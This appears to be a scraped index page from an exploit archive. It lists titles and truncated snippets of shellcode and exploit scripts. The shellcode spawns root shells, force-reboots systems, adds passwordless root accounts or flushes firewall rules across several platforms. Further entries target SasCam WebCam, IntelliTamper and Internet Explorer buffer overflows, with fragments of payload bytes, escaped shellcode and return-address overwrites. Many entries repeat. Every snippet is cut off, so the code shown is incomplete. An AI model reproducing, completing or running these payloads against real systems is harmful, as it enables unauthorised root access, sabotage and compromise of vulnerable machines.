FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

FreeBSD/x86 - execv/bin/sh Shellcode 23 bytes. Shellcode exploit for FreeBSDx86 platform / -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include include char shellcode =...

Linux/x86-64 - setreuid(0,0) + execve(/bin/ksh, [/bin/ksh, NULL]) + XOR Encoded Shellcode (87 bytes)

Linux/x86-64 - setreuid0,0 + execve/bin/ksh, /bin/ksh, NULL + XOR Encoded Shellcode 87 bytes. Shellcode exploit for Linuxx86-64 platform Title: Linux x86-64 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware...

Alpha - /bin/sh Shellcode (80 bytes)

Alpha - /bin/sh Shellcode 80 bytes. Shellcode exploit for Alpha platform / Lamont Granquist [email protected] [email protected] / int rawcode = 0x2230fec4, / subq $16,0x13c,$17 2000/ 0x47ff0412, / clr $18 2000/ 0x42509532, / subq $18, 0x84 2000/ 0x239fffff, / xor $18, 0xffffffff,...

Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode

Solaris/SPARC - setreuidgeteuid + setregidgetegid + execve/bin/sh Shellcode. Shellcode exploit for SolarisSPARC platform / Solaris shellcode - setreuidgeteuid, setregidgetegid, execve /bin/sh Claes M. Nyberg 20020124 , / include static char solariscode = / geteuid / "\x82\x10\x20\x18" / mov 24, %...

Linux/x86 - Force Reboot Shellcode (36 bytes)

Linux/x86 - Force Reboot Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform Linux/x86 Force Reboot shellcode 36 bytes Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom xor %eax,%eax push %eax push $0x746f6f62 push $0x65722f6e...

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux/x86 - Add Root User w000t + No Password Shellcode 177 bytes. Shellcode exploit for Linuxx86 platform Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : [email protected] Homepage: safemode.org File: w000t-shell.c / This shellcode...

Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes)

Linux/x86 - Flush IPTables Rules /sbin/iptables -F + exit Shellcode 58 bytes. Shellcode exploit for Linuxx86 platform / The shellcode flushs the iptables by running /sbin/iptables -F then exit greetz to zilion: man, my code is shorter! size = 64 bytes OS = Linux i386 written by /rootteam/dev0id...

Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)

Windows/x86 - Message Box + Null-Free Shellcode 140 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF ; Copyright c 2009-2010, Berend-Jan "SkyLined" Wever ; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/ ; All rights reserved. See COPYRIGHT.txt...

IRIX - execve(/bin/sh) Shellcode (43 bytes)

IRIX - execve/bin/sh Shellcode 43 bytes. Shellcode exploit for IRIX platform char shellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x02\x14" / addi $ra,$ra,532 / "\x23\xe4\xfe\x08" / addi $a0,$ra,-504 / "\x23\xe5\xfe\x10" / addi $a1,$ra,-496 /...

SasCam WebCam Server 2.6.5 Overflow Exploit

Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call esp User32.dll Module 77 E3 7E EC noping = String20, unescape"%90" lnj3ctc0d3 = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" &...

IntelliTamper 2.07/2.08 Local Stack Overflow Exploit

usage: exploit.py print "" print " IntelliTamper 2.07/2.08 ProxyLogin Local Stack Overflow\n" print " Author: His0k4" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends & muslims HaCkersdz\n" print "" header =...

IntelliTamper Local SEH Overwrite Exploit

!/usr/bin/python IntelliTamper 2.07/2.08 MAP File 0-day Local SEH Overwrite Exploit Bug discovered by cN4phux Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR Shellcode: Windows Execute Command calc Here's the debugger output like what u see, the EIP overwritten & attempt to read from address...

IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit

No description provided by source. usage: exploit.py print "" print " IntelliTamper 2.07/2.08 ProxyLogin Local Stack Overflow\n" print " Author: His0k4" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends & muslims HaCkersdz\n" print "" header =...

MS Internet Explorer XML Parsing Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl msiexmlbofvista.pl Microsoft Internet Explorer XML Buffer Overflow Exploit Jeremy Brown [email protected]/jbrownsec.blogspot.com I wanted a reliable shell, so I figured I'd whip up something nice for IE7+Vista Only the first hundred calculators...

IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit

No description provided by source. !/usr/bin/python IntelliTamper 2.07/2.08 MAP File 0-day Local SEH Overwrite Exploit Bug discovered by cN4phux [email protected] Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR Shellcode: Windows Execute Command calc metasploit.com Here's the debugger output li...

IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow

usage: exploit.py print "" print " IntelliTamper 2.07/2.08 ProxyLogin Local Stack Overflow\n" print " Author: His0k4" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends & muslims HaCkersdz\n" print "" header =...

SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow

Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call esp User32.dll Module 77 E3 7E EC noping = String20, unescape"%90" lnj3ctc0d3 = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" &...

SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit

Exploit for unknown platform in category remote exploits ===================================================== SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit ===================================================== Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call...

SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow

SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call esp User32.dll Module 77 E3 7E EC noping = String20, unescape"%90" lnj3ctc0d3 = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" &...

Microsoft Internet Explorer - XML Parsing Buffer Overflow (2)

!/usr/bin/perl msiexmlbofvista.pl Microsoft Internet Explorer XML Buffer Overflow Exploit Jeremy Brown [email protected]/jbrownsec.blogspot.com I wanted a reliable shell, so I figured I'd whip up something nice for IE7+Vista Only the first hundred calculators popping up on the screen is...